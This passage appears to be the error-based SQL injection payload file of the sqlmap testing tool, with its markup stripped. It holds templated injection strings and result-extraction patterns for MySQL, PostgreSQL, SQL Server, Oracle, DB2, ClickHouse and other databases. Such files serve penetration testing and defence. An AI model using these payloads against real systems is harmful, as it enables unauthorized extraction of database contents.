+ + + MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 5 + 1 + 7 + 1 + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML) + 2 + 3 + 1 + 1,2,3,8,9 + 1 + AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) + + + AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML) + 2 + 3 + 3 + 1,2,3,8,9 + + 1 + OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) + + + OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 5 + 1 + 1,2,3,8,9 + 1 + AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 4.1 +
+
+ + + + MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR) + 2 + 5 + 3 + 1,8,9 + 1 + OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 4.1 +
+
+ + + + MySQL OR error-based - WHERE or HAVING clause (FLOOR) + 2 + 5 + 3 + 1,8,9 + 2 + OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) + + OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) + # + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL +
+
+ + + PostgreSQL AND error-based - WHERE or HAVING clause + 2 + 1 + 1 + 1,8,9 + 1 + AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) + + AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + PostgreSQL OR error-based - WHERE or HAVING clause + 2 + 1 + 3 + 1,8,9 + 2 + OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) + + OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) + 2 + 1 + 1 + 1,8,9 + 1 + AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN) + 2 + 2 + 3 + 1,8,9 + 2 + OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT) + 2 + 2 + 1 + 1,8,9 + 1 + AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT) + 2 + 3 + 3 + 1,8,9 + 2 + OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT) + 2 + 2 + 1 + 1,8,9 + 1 + AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') + + AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT) + 2 + 3 + 3 + 1,8,9 + 2 + OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') + + OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle AND error-based - WHERE or HAVING clause (XMLType) + 2 + 1 + 1 + 1,9 + 1 + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (XMLType) + 2 + 1 + 3 + 1,9 + 2 + OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) + 2 + 2 + 1 + 1,9 + 1 + AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle + >= 8.1.6 +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) + 2 + 2 + 3 + 1,9 + 2 + OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle + >= 8.1.6 +
+
+ + + Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 2 + 3 + 1 + 1,9 + 1 + AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) + 2 + 3 + 3 + 1,9 + 2 + OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH) + 2 + 4 + 1 + 1,9 + 1 + AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH) + 2 + 4 + 3 + 1,9 + 2 + OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Firebird AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + Firebird OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 2 + OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + MonetDB AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MonetDB +
+
+ + + MonetDB OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 2 + OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MonetDB +
+
+ + + Vertica AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Vertica +
+
+ + + Vertica OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 2 + OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Vertica +
+
+ + + IBM DB2 AND error-based - WHERE or HAVING clause + 2 + 3 + 1 + 1 + 1 + AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + IBM DB2 OR error-based - WHERE or HAVING clause + 2 + 4 + 3 + 1 + 1 + OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 3 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+
+ + + ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse +
+
+ + + + + + + MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE) + 2 + 2 + 1 + 1,2,3,4,5 + 1 + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1) + + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + + + MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED) + 2 + 5 + 1 + 1,2,3,9 + 3 + (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 error-based - Parameter replace (EXP) + 2 + 5 + 1 + 1,2,3,9 + 3 + EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) + + EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET) + 2 + 3 + 1 + 1,2,3,9 + 3 + GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS) + 2 + 5 + 1 + 1,2,3,9 + 3 + JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) + + JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + MySQL >= 5.0 error-based - Parameter replace (FLOOR) + 2 + 4 + 1 + 1,2,3,9 + 3 + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) + 2 + 4 + 1 + 1,2,3,9 + 3 + (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])) + + + (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE) + 2 + 2 + 1 + 1,2,3,9 + 3 + (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))) + + + (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + PostgreSQL error-based - Parameter replace + 2 + 2 + 1 + 1,2,3,9 + 3 + (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + PostgreSQL error-based - Parameter replace (GENERATE_SERIES) + 2 + 5 + 1 + 1,2,3,9 + 3 + (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)) + + (CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase error-based - Parameter replace + 2 + 3 + 1 + 1,3 + 3 + (CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))) + + (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase error-based - Parameter replace (integer column) + 2 + 4 + 1 + 1,3 + 3 + (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]') + + (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle error-based - Parameter replace + 2 + 3 + 1 + 1,3 + 3 + (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Firebird error-based - Parameter replace + 2 + 4 + 1 + 1,3 + 3 + (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')) + + (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Firebird +
+
+ + + IBM DB2 error-based - Parameter replace + 2 + 4 + 1 + 1,3 + 3 + RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') + + RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ IBM DB2 +
+
+ + + + + MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x) + + ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP) + 2 + 5 + 1 + 2,3 + 1 + ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)))s) + + ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET) + 2 + 3 + 1 + 2,3 + 1 + ,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + ,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
